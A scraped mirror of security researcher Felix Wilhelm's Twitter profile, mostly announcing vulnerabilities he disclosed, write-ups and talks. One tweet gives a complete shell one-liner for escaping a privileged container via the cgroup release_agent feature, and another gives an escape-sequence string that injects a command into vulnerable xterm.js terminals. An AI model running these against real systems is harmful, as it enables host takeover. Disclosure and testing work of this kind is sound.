Felix Wilhelm @_fel1x Twitter profile | Pikagi

Pikagi

Felix Wilhelm

@_fel1x

10,770

Followers

721

Following

23

Media

1,282

Statuses

Co-founder and CTO of Asymmetric Research ( @asymmetric_re )

Zürich, Switzerland

https://t.co/dBgX3xt86u

Joined November 2010

Don't wanna be here? Send us removal request.

Pinned Tweet

@_fel1x

Felix Wilhelm

9 months

I’ve started a new security company together with @claudijd : Asymmetric Research ( @asymmetric_re / ). If you are a strong security engineer or researcher interested in defending and breaking some of the biggest DeFI and Blockchain projects, we’d love to

Tweet card media

Asymmetric Research | Enabling Secure Innovation

Asymmetric Research is a boutique security venture focused on deep partnerships with L1/L2 blockchains and DeFi protocols in an effort to keep them safe.

www.asymmetric.re

7

10

104

Last Seen Profiles

@0___entm

@AundreaDan15133

@Valebakery1

@EEC_ELA

@rubi__kitty

@tiktok_vnm

@s_m080117

@morningstarSP

@seanwoodsracing

@TidesWar

@bokeplokalmalam

@caleyxnrr

@veromsherrera

@bokeplokalmalam

@revebbv

@harvey__ai

@EileneJoey13497

@171_haya

@shuaadakuotayey

@MyLynwoodca

@theprettiests4l

@penyukastw21

@em7438

@goyoumatsu3150

@kettouchi500

@XaFoxArt

@HellysonFerrei2

@BinorRaja

@BinorRaja

@FNikeisha2383

@bokeplokalmalam

@CuomoWatch

@stw_pdg

@exok_hk

@Barbarella451

@SukaIbuIbuTua2

@_fel1x

Felix Wilhelm

3 years

I stumbled upon a fun heap overflow in Github's markdown rendering library. RCE via a malicious README 🤔 Demonstrates the risk of memory unsafe dependencies used by scripting languages.

Tweet media one

8

210

819

@_fel1x

Felix Wilhelm

4 years

You might want to update your F5 Big IP appliances: . and are two data-plane bugs that got fixed.

Tweet media one

13

344

752

@_fel1x

Felix Wilhelm

2 years

Slides for my SAML talk at @hexacon_fr are now online: . Includes details of CVE-2022-34169, a fun JIT bug that you should check out.

Hacking the Cloud With SAML.pdf

drive.google.com

7

184

620

@_fel1x

Felix Wilhelm

5 years

My writeup for the haproxy http2 bug (CVE-2020-11100) is now public: . Includes a PoC exploit to demonstrate RCE against Ubuntu 19.10.

4

239

604

@_fel1x

Felix Wilhelm

3 years

My report for this bug is now public: . Thanks @github for donating a 40000$ bounty to Médecins Sans Frontières ()

Tweet card media

MSF - Médecins Sans Frontières | Medical humanitarian organisation

MSF is an international, independent organisation. We provide medical assistance to people affected by conflict, epidemics, disasters, or exclusion from healthcare

@_fel1x

Felix Wilhelm

3 years

I stumbled upon a fun heap overflow in Github's markdown rendering library. RCE via a malicious README 🤔 Demonstrates the risk of memory unsafe dependencies used by scripting languages.

Tweet media one

8

210

819

7

118

569

@_fel1x

Felix Wilhelm

6 years

CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivates: . Exploit fits in a tweet so you should patch as soon as possible.

Tweet card media

DHCP Client Script Code Execution Vulnerability - CVE-2018-1111 | Red Hat Customer Portal

Access Red Hat’s knowledge, guidance, and support through your subscription.

access.redhat.com

11

510

551

@_fel1x

Felix Wilhelm

4 years

Enter the Vault: Authentication Issues in HashiCorp Vault

9

226

522

@_fel1x

Felix Wilhelm

7 years

Happy to hear that Windows is secure again now that MS patched the last remaining bug in their unsandboxed, system-privileged JS runtime.

8

226

502

@_fel1x

Felix Wilhelm

5 years

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

10

153

501

@_fel1x

Felix Wilhelm

3 years

An EPYC escape: Case-study of a KVM breakout

9

215

509

@_fel1x

Felix Wilhelm

3 years

weggli, my attempt at writing a fast and robust semantic search tool for C and C++ code is now open source: . Please take a look and let me know what you think.

15

136

486

@_fel1x

Felix Wilhelm

7 years

We found some interesting bugs in dnsmasq:

Tweet card media

Behind the Masq: Yet more DNS, and DHCP, vulnerabilities

Posted by Fermin J. Serna, Staff Software Engineer, Matt Linton, Senior Security Engineer and Kevin Stadmeyer, Technical Program Manager O...

security.googleblog.com

7

403

464

@_fel1x

Felix Wilhelm

2 years

If you perform SAML auth in Java you should make sure you patched . RCE during signature verification. Blogpost coming soon™.

5

127

384

@_fel1x

Felix Wilhelm

3 years

AWS fixed a terminal escape injection in AWS CloudShell. The bug could have resulted in a full account compromise if an admin views malicious logs or external data using CloudShell:

2

95

327

@_fel1x

Felix Wilhelm

5 years

Quick and dirty way to get out of a privileged k8s pod or docker container by using cgroups release_agent feature.

Tweet media one

6

118

328

@_fel1x

Felix Wilhelm

6 years

CVE-2019-7221 is a pretty nice guest-triggerable use-after-free in KVM () and CVE-2019-7222 is an info leak to help with exploitation ().

3

156

260

@_fel1x

Felix Wilhelm

5 years

Super excited about joining the team :)

@benhawkes

Ben Hawkes

5 years

We're excited to welcome Felix Wilhelm ( @_fel1x ) to Project Zero today!

20

18

307

26

6

254

@_fel1x

Felix Wilhelm

4 years

is an interesting design flaw in Github Actions. Actions that print untrusted data to STDOUT are vulnerable to an injection attack that can be turned into code exec.

Tweet media one

6

80

227

@_fel1x

Felix Wilhelm

8 years

As promised in my last tweet: Using branch target buffer collisions to break hypervisor ASLR. PoC on github:

Tweet card media

GitHub - felixwilhelm/mario_baslr: PoC for breaking hypervisor ASLR using branch target buffer...

PoC for breaking hypervisor ASLR using branch target buffer collisions - felixwilhelm/mario_baslr

1

199

218

@_fel1x

Felix Wilhelm

6 years

systemd has its own dhcp client. Turns out it had a bug: . Results in a controlled OOB heap write.

Bug #1795921 “Out-of-Bounds write in systemd-networkd dhcpv6 opt...” : Bugs : systemd package :...

systemd-networkd contains a DHCPv6 client which is written from scratch and can be spawned automatically on managed interfaces when IPv6 router advertisement are received: "Note that DHCPv6 will by...

bugs.launchpad.net

7

107

216

@_fel1x

Felix Wilhelm

6 years

CVE-2019-0542 is a RCE bug due to insecure terminal escape sequence handling in xterm.js (a xterm rewrite in javascript). Affects vscode and azure cloud shell (cc @teh_gerg :))

Tweet card media

Releases · xtermjs/xterm.js

A terminal for the web. Contribute to xtermjs/xterm.js development by creating an account on GitHub.

3

104

213

@_fel1x

Felix Wilhelm

4 years

The list of projects compromised by the codecov hack is pretty scary: (see )

Tweet card media

Bash Uploader Security Update - Codecov

Update 4/29/2021 3PM PT: Through our investigation, we now have additional information concerning what environment variables may have been obtained without authorization and how they may have been...

about.codecov.io

@ryanaraine

Ryan Naraine

4 years

Another significant software supply chain hack: Codecov Bash Uploader breach went undetected for four months as attackers stole credentials, tokens and keys from orgs around the world

4

81

124

3

135

207

@_fel1x

Felix Wilhelm

3 years

is a (surprisingly easy) bug in containerd that allows a malicious container to read host files. It’s an interesting issue because it will work even if the container is sandboxed with gvisor or firecracker.

5

63

192

@_fel1x

Felix Wilhelm

5 years

🤵🏻👰🏼

Tweet media one

44

2

178

@_fel1x

Felix Wilhelm

2 years

Another SAML bug:

Tweet card media

Signature bypass via multiple root elements

### Impact A remote attacker may be able to bypass SAML authentication on a website using passport-saml. A successful attack requires that the attacker is in possession of an arbitrary IDP signe...

1

59

176

@_fel1x

Felix Wilhelm

2 years

New year, new job, new bugs. Published a write-up about an interesting integer overflow issue in BNB Chain, the 4th largest blockchain.

@jump_

Jump Crypto 🔥💃🏻

2 years

We are now sharing the technical write-up of the vulnerability in @bnbchain that @_fel1x (a security researcher at @jump_ ) discovered and responsibly disclosed earlier this week:

27

50

445

11

20

173

@_fel1x

Felix Wilhelm

2 years

Another SAML bug to wrap up the year: .

2

46

172

@_fel1x

Felix Wilhelm

9 years

Slides for my @44CON talk about FireEye: #playingwithfire

5

228

153

@_fel1x

Felix Wilhelm

6 years

Found a nice bug in KVM's nested virtualization functionality:

0

88

153

@_fel1x

Felix Wilhelm

9 years

Slides for my #TR16 talk about Palo Alto firewalls:

5

88

151

@_fel1x

Felix Wilhelm

5 years

Fun bug in git: . Newline injection in the credential helper protocol can be used to exfiltrate credentials during a git clone.

4

66

146

@_fel1x

Felix Wilhelm

4 years

Apache 2.4.46 has fixes for three vulnerabilities I reported () The http2 push diary bug is the most interesting one: Depending on your distris mod_http2 version it is either a wild memmove or a controlled OOB write ()

3

49

145

@_fel1x

Felix Wilhelm

7 years

Turns out musl had a stack based buffer overflow in getaddrinfo(): ¯\_(ツ)_/¯

@thegrugq

thaddeus e. grugq

9 years

glibc has a stack based buffer overflow in getaddrinfo(). When with @musllibc have full feature parity??

2

8

28

3

82

139

@_fel1x

Felix Wilhelm

2 years

Another fun bug reachable via SAML: . Arbitrary file read during XML signature verification in .NET.

0

33

138

@_fel1x

Felix Wilhelm

6 years

So Cloudflare trusts v8 for multi-tenant isolation? That‘s bold.

Cloud Computing without Containers

We have a cloud computing platform called Workers. Unlike essentially every other cloud computing platform I know of, it doesn’t use containers or virtual machines. We believe that is the future of...

blog.cloudflare.com

6

59

133

@_fel1x

Felix Wilhelm

3 years

runc: insecure handling of bind mount sources . Incorrect handling of null-bytes and an integer overflow during message serialization. Good example of the type of bugs you can find in low-level Go code.

2

43

131

@_fel1x

Felix Wilhelm

2 years

is a heap-buffer-overflow in libxml2 for very large inputs. Easy to trigger when you can run XSLT. Another example of a bug that's hard to fuzz but easy to find manually.

2

41

133

@_fel1x

Felix Wilhelm

6 years

What could go wrong...

Tweet media one

6

75

124

@_fel1x

Felix Wilhelm

2 years

Gregor Samsa: Exploiting Java's XML Signature Verification

10

63

122

@_fel1x

Felix Wilhelm

7 years

If you use evince you should upgrade: drive-by RCE due to a cmd injection in their comic book handler ¯\_(ツ)_/¯

5

103

117

@_fel1x

Felix Wilhelm

4 years

"Executing Some Instructions May Cause Unpredictable Behavior" is a great summary for the state of IT security in 2020 (from ).

Tweet media one

2

47

116

@_fel1x

Felix Wilhelm

2 years

New blog post about an Ethermint vulnerability I discovered: . This is a good example of how complex interactions between different Cosmos modules can lead to vulnerabilities.

3

25

115

@_fel1x

Felix Wilhelm

8 years

small teaser for my current spare-time project: breaking hypervisor (K)ASLR with hardware timing attacks :)

Tweet media one

6

65

99

@_fel1x

Felix Wilhelm

3 years

is a powerful KVM OOB read/write that can be exploited by AMD SEV-ES guests.

2

26

99

@_fel1x

Felix Wilhelm

6 years

Slides from my DHCP talk at @kiwicon and @HITBSecConf are now online: #HITB2018DXB #kiwicon

0

49

94

@_fel1x

Felix Wilhelm

8 months

First post on the Asymmetric Research blog. A critical bug in Polygon's Heimdall validator that put over $2B of crypto assets at risk.

@asymmetric_re

asymmetric research

8 months

New blog post: Ethereum Log Confusion in Polygon's Heimdall. A critical vulnerability in Polygon PoS that could have allowed a rogue validator to take over the Heimdall consensus layer, putting over $2B of crypto assets in the PoS bridge at risk.

4

25

112

4

15

84

@_fel1x

Felix Wilhelm

3 years

The bug is also a good example for an issue that's hard to find with a fuzzer (due to the size requirement), but easy to spot during code review.

2

4

74

@_fel1x

Felix Wilhelm

4 years

I found an arbitrary file write in (part of Sublime's Package Control) extension: . Super impressive response time by @wbond

1

12

74

@_fel1x

Felix Wilhelm

4 years

I reported two interesting issues in usrsctp, which are now fixed: and . Take a look at @natashenka amazing blog series on Android messenger exploitation to see why you should care about usrsctp:

0

24

66

@_fel1x

Felix Wilhelm

4 years

Node.js fixed an interesting TLS session caching bug: . Multiple HTTPs requests to the same host can bypass hostname verification by reusing an invalid TLS session.

0

24

61

@_fel1x

Felix Wilhelm

6 years

Got a #pwnie nomination for cve-2018-1111 \o/

2

8

61

@_fel1x

Felix Wilhelm

1 year

New blogpost about a double voting vulnerability that put $130M locked into the Celer cBridge at risk:

Tweet card media

Election Fraud? Double Voting in Celer’s State Guardian Network

We describe a vulnerability in Celer's State Guardian Network, which would have allowed a malicious validator to compromise Celer's cBridge.

4

16

62

@_fel1x

Felix Wilhelm

7 years

ISC patched two interesting bugs in their DHCP codebase: A global buffer overflow triggerable over DHCPv6 and a refcount overflow -> use-after-free bug in their option parsing: and

1

36

56

@_fel1x

Felix Wilhelm

4 years

Node.js patched an easy to trigger UaF in their TLS implementation: . Seems very hard to exploit against Current on Linux, but other version-OS combinations might be doable.

0

21

54

@_fel1x

Felix Wilhelm

6 years

doesn't really inspire confidence in IBM Cloud. Bare metal servers with off-the-shelf BMC and no re-flashing for redeployment 😕

Tweet card media

The Missing Security Primer for Bare Metal Cloud Services - Eclypsium

In this blog, we will examine the security implications for bare-metal and general cloud services, provide recent research that demonstrates the real-world risks to organizations, and finally provide...

6

23

52

@_fel1x

Felix Wilhelm

9 years

Blogpost about some interesting double fetch vulnerabilities I discovered in Xen: #XSA155

0

62

50

@_fel1x

Felix Wilhelm

6 years

XSA-270 is a pretty straight-forward integer overflow in xen-netback. The feature is only used by windows guests running citrix guest drivers but it's enabled by default and can be triggered from both HVM and PV guests:

1

30

51

@_fel1x

Felix Wilhelm

2 years

@tgraf__ Tetragon looks cool, but I think the blog post should be more transparent about its limitations. The CVE-2021-22555 example isn't mitigating the bug, it's blocking the exploit _after_ it already achieved kernel code execution. It's very easy to bypass policies like this.

Tweet media one

4

6

53

@_fel1x

Felix Wilhelm

4 years

AWS fixed some issues in their Kubernetes IAM auth provider: . None of them are super critical, but it's another example of sts:GetCallerIdentity being hard to use securely.

0

17

51

@_fel1x

Felix Wilhelm

5 years

You might want to patch your haproxy instances:

1

18

49

@_fel1x

Felix Wilhelm

6 years

Intel is hiring a lot of smart security people lately 👍

4

1

49

@_fel1x

Felix Wilhelm

6 years

I‘ll be speaking about this and other results of my DHCP vulnerability research at @kiwicon in NZ and @HITBSecConf in Dubai next month. First public talks in two years :)

@_fel1x

Felix Wilhelm

6 years

systemd has its own dhcp client. Turns out it had a bug: . Results in a controlled OOB heap write.

7

107

216

1

16

48

@_fel1x

Felix Wilhelm

5 years

Nice talk on container escapes by @drraid and @0x7674 :

1

16

49

@_fel1x

Felix Wilhelm

8 years

Had a great first week at Google Zürich :)

Tweet media one

4

2

43

@_fel1x

Felix Wilhelm

6 years

Thanks to @0dayMarketing this bug has a name, logo and theme song now: #dynoroot

2

10

43

@_fel1x

Felix Wilhelm

8 years

FreeBSD fixed a bhyve VM escape I reported a couple of months ago:

0

33

42

@_fel1x

Felix Wilhelm

8 years

Oracle patched a fun OOB write bug in the Virtualbox virtio implementation (only 2 weeks after my initial report):

2

39

41

@_fel1x

Felix Wilhelm

9 years

Slides for my Xenpwn talk from @InfiltrateCon and @SyScan : , code + WP will be published soon™

2

56

40

@_fel1x

Felix Wilhelm

11 years

A short teaser about our research on MS13-092, a rather interesting Hyper-V bug: http://t.co/6NeZoB652O

2

29

38

@_fel1x

Felix Wilhelm

9 years

Palo Alto patched a couple of bugs I reported to them: . The VPN buffer overflow is quite serious.

7

55

36

@_fel1x

Felix Wilhelm

3 years

Long time followers will notice that this is a 1:1 copy of the Azure Cloud Shell/VSCode bug I reported ~2 years ago.

@_fel1x

Felix Wilhelm

6 years

CVE-2019-0542 is a RCE bug due to insecure terminal escape sequence handling in xterm.js (a xterm rewrite in javascript). Affects vscode and azure cloud shell (cc @teh_gerg :))

3

104

213

0

3

36

@_fel1x

Felix Wilhelm

6 years

echo -e "abcdef\x1bP+qfoo;\ntouch /tmp/foo;aa\n\x1b\n" to test if your terminal emulator is using a vulnerable version of xterm.js

0

11

37

@_fel1x

Felix Wilhelm

9 years

Cool technique to bypass Bitlocker in TPM only mode:

0

32

34

@_fel1x

Felix Wilhelm

8 years

Xenpwn got accepted at #BHUSA : ! See you in Vegas :)

7

12

35

@_fel1x

Felix Wilhelm

8 years

After 4 years, today was my last day at ERNW. Had a great time and learned a lot. Thank you all!

6

3

34

@_fel1x

Felix Wilhelm

2 years

A really fun Zoom 0-click RCE by @ifsecure

@ifsecure

Ivan Fratric 💙💛

2 years

How do you do, fellow kids. I hear 0-click exploits are "cool" this season, so allow me to present my take on that :). And when I say "present", I will actually be presenting more details on this type of attacks at @BlackHatEvents in August.

2

56

244

0

5

32

@_fel1x

Felix Wilhelm

7 years

Surprising attack surface vol.2: Code execution in apport when opening a file with .crash extension:

Bug #1700573 “Code execution through path traversal in .crash fi...” : Bugs : Apport

The function add_hooks_info in apport/report.py is vulnerable to a directory traversal when processing the ExecutablePath key of a malicious .crash file: opt_path = None if self.get('ExecutablePath',...

bugs.launchpad.net

1

28

32

@_fel1x

Felix Wilhelm

10 years

Published a small writeup about the recent vulns in the Xen x86 emulation code: http://t.co/9ArRfRpEHb

1

36

31

@_fel1x

Felix Wilhelm

6 years

AWS Lambda runs on top of a crosvm fork(i.e rust). And it’s open source now. Nice :)

Tweet card media

Announcing the Firecracker Open Source Technology: Secure and Fast microVM for Serverless Computing...

中文版 New Challenges for Virtualization Today, our customers can use serverless computing to build applications without worrying about provisioning or managing infrastructure. Developers can package...

0

14

30

@_fel1x

Felix Wilhelm

1 year

We published a writeup about a fun Cosmos / IBC bug. An attacker could trigger emission of events even though the corresponding state changes aren't committed.

@jump_

Jump Crypto 🔥💃🏻

1 year

Our security team recently found a vulnerability in ibc-go, the reference implementation of the Interblockchain Communication Protocol (IBC) used by most @Cosmos blockchains.

71

62

279

2

7

30

@_fel1x

Felix Wilhelm

9 years

Please read our (updated) blog post regarding the FireEye disclosure: . It should clear up some misunderstandings.

2

44

28

@_fel1x

Felix Wilhelm

4 years

Watching @_tsuro go from "hardware bugs are way out of my comfort zone" to in <18 months is super impressive :)

Tweet card media

Spectre in JavaScript

A Spectre demo written in JavaScript for Chrome 88.

@_tsuro

stephen

4 years

I made a website:

12

305

971

1

1

29

@_fel1x

Felix Wilhelm

8 years

This task_t bug class by Ian Beer is hilarious: . Really great research!

1

21

28

@_fel1x

Felix Wilhelm

6 years

Dan Carpenter found a super simple out-of-bounds access in the KVM 'send IPI' hypercall: . Was introduced a month ago so it shouldn't affect too many real world deployments:

0

21

26

@_fel1x

Felix Wilhelm

9 years

REDSHIFT: 105k$ for Flash Vuln + PrivEsc. Finally some real prices available ;)

1

40

26

@_fel1x

Felix Wilhelm

8 years

Qemu patched a dir traversal I reported in virtfs/9p: Might allow host breakout from KVM guests that use VirtFS.

0

33

22

@_fel1x

Felix Wilhelm

8 years

Just realized I got credits for a Hyper-V RCE (CVE-2017-0162) patched in the latest update :).

4

4

23

@_fel1x

Felix Wilhelm

10 years

Sendmail crackaddr - Static Analysis strikes back: http://t.co/sp4cnAQ1mi

2

14

23

@_fel1x

Felix Wilhelm

8 years

Talk went well :) #BHUSA

5

2

23

@_fel1x

Felix Wilhelm

9 years

FireEye released a security notice regarding the topic of my upcoming @44CON talk: #44CON #playingwithfire

3

36

23

@_fel1x

Felix Wilhelm

9 years

XSA-148, or how to own Amazon EC2 for the last 7 years.

5

34

21

@_fel1x

Felix Wilhelm

6 years

Had a great time at #Kiwicon . Highly recommended :)

Tweet media one

1

0

22

@_fel1x

Felix Wilhelm

9 years

FireEye released a customer notice regarding some vulns I reported: . You should probably patch immediately..

0

21

20

@_fel1x

Felix Wilhelm

2 years

Featuring weggli 🙂

@pwningsystems

Jordy Zomer

2 years

Earlier this year I found a vulnerability in Apple's kernel (XNU) and I decided to write a blog-post about it. I hope this is useful to some of you! 😁 #apple

8

93

361

0

1

21

@_fel1x

Felix Wilhelm

6 years

🙈

@jpdanner

Jason Danner

6 years

I'm enjoying the gesticulating. #Kiwicon

1

0

3

4

0

21

@_fel1x

Felix Wilhelm

2 years

I’m in Vegas till Sunday. If you see me say hi!

1

0

21

@_fel1x

Felix Wilhelm

4 years

A successful exploit would give an attacker write access to the repo and access to all encrypted secrets used by the workflow.

0

3

20

@_fel1x

Felix Wilhelm

9 years

sslvpn Remote root exploit for my #TR16 talk is working :) MIPS64 ROP turns out to be quite time consuming!

3

13

20

@_fel1x

Felix Wilhelm

10 years

Big IDA leak: http://t.co/keeRmL3P4L (Fraunhofer-Institut, Kaspersky, Microsoft, TrendMicro, RSA..)

2

27

20